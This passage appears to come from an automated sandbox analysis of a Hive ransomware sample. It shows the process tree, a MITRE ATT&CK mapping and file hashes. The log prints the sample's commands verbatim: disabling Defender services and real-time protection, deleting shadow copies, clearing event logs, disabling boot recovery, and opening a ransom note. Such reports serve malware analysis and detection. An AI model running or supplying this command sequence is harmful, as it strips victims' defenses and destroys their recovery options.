C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:2148
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:5464
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:880
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:1056
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:5388
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:3008
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:4192
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:400
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2716
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2516
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3964
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2576
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3944
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:4440
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1792
-
-
-
C:\Windows\SYSTEM32\notepad.exenotepad.exe C:\phLK_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:384
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\Desktop\Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe"2⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1196 -
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4548
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1920
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3296
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Documents\phLK_HOW_TO_DECRYPT.txt1⤵
- Opens file in notepad (likely ransom note)
PID:516
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:3892
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:6112 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x124,0x128,0x12c,0x70,0x130,0x7ffe3725dcf8,0x7ffe3725dd04,0x7ffe3725dd102⤵PID:4360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1976,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1968 /prefetch:22⤵PID:3596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2308,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2320 /prefetch:32⤵
- Downloads MZ/PE file
PID:3036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2440,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2456 /prefetch:82⤵PID:2152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3236,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3248 /prefetch:12⤵PID:3768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3540,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3568 /prefetch:12⤵PID:1912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4568,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4564 /prefetch:22⤵PID:1476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4696,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3908 /prefetch:12⤵PID:2500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4708,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4928 /prefetch:12⤵PID:5668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5440,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5464 /prefetch:82⤵PID:1400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3248,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5852 /prefetch:82⤵PID:4436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5856,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5852 /prefetch:82⤵PID:2928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3660,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5848 /prefetch:82⤵PID:2440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5980,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6128 /prefetch:82⤵PID:2924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5964,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5864 /prefetch:82⤵PID:4352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5448,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6052 /prefetch:82⤵PID:3500
-
-
C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-14.0.9.exe"C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-14.0.9.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:3248 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3792 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:4860 -
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=2524 -parentBuildID 20250331180000 -prefsHandle 2500 -prefMapHandle 2488 -prefsLen 21011 -prefMapSize 252329 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {ec74335d-3698-4828-b201-1f7b79fc1eae} 4860 gpu5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3100
-
-
C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe" -f "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc" DataDirectory "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor" ClientOnionAuthDir "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\onion-auth" --defaults-torrc "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc-defaults" GeoIPFile "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip" GeoIPv6File "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip6" +__ControlPort 127.0.0.1:9151 HashedControlPassword 16:3af5164c5deffed9606e677461027ccd5991c33592a397b39200ab74df +__SocksPort "127.0.0.1:9150 ExtendedErrors IPv6Traffic PreferIPv6 KeepAliveIsolateSOCKSAuth" __OwningControllerProcess 4860 DisableNetwork 15⤵
- Executes dropped EXE
PID:2876
-
-
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=2152 -childID 1 -isForBrowser -prefsHandle 2284 -prefMapHandle 2280 -prefsLen 21821 -prefMapSize 252329 -jsInitHandle 1392 -jsInitLen 234912 -parentBuildID 20250331180000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {273e8e57-ff5a-411a-bd89-1e3ec8af4e63} 4860 tab5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3604
-
-
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=3244 -childID 2 -isForBrowser -prefsHandle 3236 -prefMapHandle 3232 -prefsLen 22591 -prefMapSize 252329 -jsInitHandle 1392 -jsInitLen 234912 -parentBuildID 20250331180000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {09e6225f-af04-4b48-8c3b-050a955a259d} 4860 tab5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4516
-
-
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=3432 -childID 3 -isForBrowser -prefsHandle 3440 -prefMapHandle 3444 -prefsLen 22667 -prefMapSize 252329 -jsInitHandle 1392 -jsInitLen 234912 -parentBuildID 20250331180000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {e112c1e7-88ff-4ba5-bc41-8e1bf35dd740} 4860 tab5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5128
-
-
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=3892 -parentBuildID 20250331180000 -prefsHandle 3976 -prefMapHandle 3980 -prefsLen 23093 -prefMapSize 252329 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {7a25e43c-725a-4f51-8eff-03620b898501} 4860 rdd5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2304
-
-
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=1760 -childID 4 -isForBrowser -prefsHandle 3684 -prefMapHandle 3488 -prefsLen 22517 -prefMapSize 252329 -jsInitHandle 1392 -jsInitLen 234912 -parentBuildID 20250331180000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {cadd6a90-ae0d-4283-bac3-92f3b26c67a7} 4860 tab5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2440
-
-
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=1892 -childID 5 -isForBrowser -prefsHandle 4104 -prefMapHandle 4100 -prefsLen 22517 -prefMapSize 252329 -jsInitHandle 1392 -jsInitLen 234912 -parentBuildID 20250331180000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {2f79c45e-850e-4427-9248-62f268b04106} 4860 tab5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:1964
-
-
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=1880 -childID 6 -isForBrowser -prefsHandle 1916 -prefMapHandle 1776 -prefsLen 22517 -prefMapSize 252329 -jsInitHandle 1392 -jsInitLen 234912 -parentBuildID 20250331180000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {2cb7cbe8-1ae8-41be-a171-c5acdf35d4a0} 4860 tab5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4576
-
-
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=4532 -parentBuildID 20250331180000 -sandboxingKind 0 -prefsHandle 3716 -prefMapHandle 4512 -prefsLen 25640 -prefMapSize 252329 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {59517a1f-b918-401a-a6e0-cf1f68e772b5} 4860 utility5⤵
- Executes dropped EXE
- Checks processor information in registry
PID:3488
-
-
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=4832 -childID 7 -isForBrowser -prefsHandle 4660 -prefMapHandle 4860 -prefsLen 24401 -prefMapSize 252329 -jsInitHandle 1392 -jsInitLen 234912 -parentBuildID 20250331180000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {54c48e41-6a01-449f-902a-c658b82d46fa} 4860 tab5⤵
- Executes dropped EXE
PID:5204
-
-
C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=5504 -childID 8 -isForBrowser -prefsHandle 3180 -prefMapHandle 1812 -prefsLen 24685 -prefMapSize 252329 -jsInitHandle 1392 -jsInitLen 234912 -parentBuildID 20250331180000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {27673ca7-db2e-45a4-b28a-871a4b737dd0} 4860 tab5⤵
- Executes dropped EXE
PID:4384
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:1200
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4632
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Impair Defenses
3Disable or Modify Tools
2Indicator Removal
3Clear Windows Event Logs
1File Deletion
2Modify Registry
4Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57c7498625660600d7277d186038c05fa
SHA1144ea5eccf0824e9c30681f64c25224753886533
SHA2561da21b2c48b5e60b2e6ced94b990c73a0644fc147cc13b38c022a9f1c058ad3c
SHA51232ee4b3ba5a1c86ee47be70428204af3f30f865eba33693a235dd7c6ae51d33369b4a486ee41e837c8fbe117edf54ba0cd01b1535a369c14683ca833768d4e92
-
Filesize
649B
MD58399f344c2d3afdbbf016c1ca2730b8d
SHA10a55b7c0cbeb7107c46c2e320ba8fa30d4f92ab6
SHA2568c2ac311720c91cf9417d8f7f9cd3a40245b5a1f282458edaf927fcdd0789eb6
SHA5124a46e5291f41928e01ada130847043ff68139bfe9ec2fbd3dba258ad596be82664fdaf7945f044e089cd8e89f3ef0ac078e7682e508b0b9b2893934b23bdc1c9
-
Filesize
264B
MD5776cc54c8d5a3561e99fd1c25ccd4415
SHA1cfb2fa94345f0a22721d91b2f1efb74965297277
SHA2567582a0c5c7687766366bd442a9b1b8c6f9501d6ecddb2af494cb706f39c75112
SHA5121242e034da2e917737586289e3aea6b0be121bf6059aa9149cafb655941ca2b37875c2772cf151a4841d587e64e682cb2658e948143ebb5dbf3dbc4c2969424a
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
3KB
MD543b0919f046eabcb2d4d2b2d9534e750
SHA1bc75f79dcb0e3aaca61341d825bc798d3b66fdd6
SHA256b887f0881911f5654d72ef23c3258ac90bf2a364c03cafcb969eab83e729b63b
SHA512ea23c27c75628459a224509411bf3ae8b0277bbcf7e9b486afec75ef5bce67a6a8ea95fcd069686e6730189994a033ad65a05d4ddb816bf9b0c42807d0bacdef
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
859B
MD50a744e815af294fed8b96e083878673e
SHA14eca9ba4ab1426b019bff047bb98355443d5b689
SHA2563b770dda81e66cf7b30b8a424c98a602d98942daf3f0892ab7799ee655e700db
SHA512b90563743abf5fb1c8e877111c1ef10f0be751d632bdeb0d89fb10aead3f361a1faa0bc697ad466fab1293497fd3e17ab0b7dc5aeabc8ced54ab05f91f720518
-
Filesize
10KB
MD5af71aa0ee8f4abff0fee47cb58d15c28
SHA104eddf20b3b768a256e0a626177a37b8f636af5e
SHA25607e539af62ec176eaac85f0fda8f07f43d1eaf9d8d5cfd3dc65fcef268f9af3b
SHA512fe3f71ed4e02c3654d079d2eef761d3ce471d1fcc202a9031bc2cb1874b649ecff22217985edd63dbe42b7c552be1d4d1b308fac54e3c02cd25187d5e422aafd
-
Filesize
15KB
MD5baeac45dfd871cbb4d0646d84dc2b5b9
SHA134a3225e541d1b01688b6921b98bfb08d69b89c3
SHA2569588d49bbb3e4feb573378ee7cc4126c89bcdd43f4d334dd2cbffdfc2032daa8
SHA512a121ff2455c22a7f2254645b99a0f8363b28b88983f3b6d73781fef642980d81ea5417410c2ebc03a718c067da4a3bcc69e489b143fc1b8f986e7aa57e6b5036
-
Filesize
18KB
MD532fc560963a8e187f82f001b441b1d02
SHA17b498f415b49d35705d94572f67b95d31cdd0a69
SHA25685d5de374842ea3a95f7f3563d23183dd937eb85cd7a5a9909024c2eeeb81be9
SHA5122f91de771c96ec6af4f8cc55188fb7215e96870f627cdf339cd82323485f7ff7582187e26c3dcaceba40315a781b7a5a3770c6ef2bc3131bf74c8eb53ebd1a19
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize72B
MD526881291e95c39f882baa069ceaea2c8
SHA1c79005e98aac44ad57194c9c3053df91de2ff9b3
SHA256e9e019b88ed280b1fa0246d06927aa29d09af6443e2ec14c415b29ca5416dc53
SHA512c4f559e84680611eab79a94bd159f0dee236bc5a1d172cfa831dc2c34a603cc11ecb1dc25565f019c3e393d7e9dd86a6323f4b0684eb1335c9373e180e9f740c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58efba.TMP
Filesize48B
MD5b3793df03daaf34261aa1808b8bc68a8
SHA100426905b729b1755ed0b1c94f6bf6eab18b48c8
SHA2561b48dbd1d90ef6e6aabf7e53c6fda74e9df8c1de0e11061f5cc5f6721ac81530
SHA512191374c201b88c9e6bd6ff6f995044e132d8e55d3fe11f9c62f11a75f5b382d20a83419d1f1afb0e219e7bb4e1079e707b4bacda3aa361a67b960126dba69330
-
Filesize
80KB
MD5c00c0cfcad525a49ec0b2a2abd5b67cb
SHA1d233585a22fa822e279518f269ebf1d446bf9cc2
SHA256fe6895e96e5844c51a8f87f44699b2bd136e7c70fb72f70dfff3e8205e5df212
SHA512b561d316adf1f352b7594eaf0a8d75c85997304e5777e3a8b3aaa55abe48883100a3aca299eb1766e1197f827e435f39ae1c36284e13a6d027c60cfa0175514b
-
Filesize
153KB
MD58f91e3fc4d75ec6f0af7c3f3bd949528
SHA1e87656d5ba1aed9dc1ef28ce5abfbfa6c6ea6407
SHA2560c7a7a9221a3f6d0c573dab1f940211d1cdf5c217bbaa495b845c1a39f29b7b9
SHA51234b03379635ec652744db88641db7724f59e93df3d4201382ae6c79938b7bc366f2f3914bf54d570880c02b5cd1ce08d74cdf75003bf666328f70c890436107d
-
Filesize
153KB
MD52d350644abba36bc286b56272217b80c
SHA1360346bd69a05b2e58ffb1aa911f07c797848bc2
SHA2562d95e8d8a09c8e0c319886efd014f3ec0096b977e354fdb27f2e6c08ecd05742
SHA512fa6ae118a08d58620344a0609ab696718c3bf292c738b96185cce06f91b726abb3604f07c7c4b7ee4674ffa2aa3d81405180444422986f09b50779f0449772c6
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5657d20ba6358ff78dd8a138d67db728c
SHA183d2472cce7807044bfbc022189e42e7767e7372
SHA2569570e6f43affb98ad6f4228ad965ffc0a6829d2b40b4b073bb8677e7ba29dcee
SHA512f0d27d99debe3b194016115a0032d7cbd3efaf365271fe5f99c512d41b4eb32ee9ef0654cc6c4e6a5182b1e5b0201e4cb163d358c515e2a247493cc53b7313cc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD59888fb6b91a680305b2a3e7b71d6561d
SHA14a7935da38f88e9f74f425078ee39eb6269c4e63
SHA25681726604d47b192620bcf90d6e42ba8ee8b4c54935b0081655e08247d6b6c675
SHA512f50755e5624bfc3a60a23a7dda012509c1e31d9772d6a0ccaca88e32ae8d4602e10e38003d78b1626464502db7ea7c47d772efb7b3ea7c3e2238bf3b9809f833
-
Filesize
24KB
MD5d997606c77e880be2744c44128843d60
SHA192bb9003dc14ae03963f503e82a668877ca4295f
SHA256abb2613ff851b2cbfb61bf97e4eef9d4912abcb46e04774ad84812ab75d4dde9
SHA512714d7ce786e9fbb6f0d0e537a146a3a24aa79089669dd168b7c110dfba667fa7afb794b3dd2b93fa76e1d1771af3347a0f568cbb0fbcc8d9755de9e6e54382b3
-
Filesize
13KB
MD5bd0d7a73d0fc619e280372587e9e3115
SHA10cde473dda5d4fda8190e6460f3229cae2571af5
SHA256c7f2afe3a2424e71563e69d862dc027d299d84fba4ac1ba11e593361daec0a80
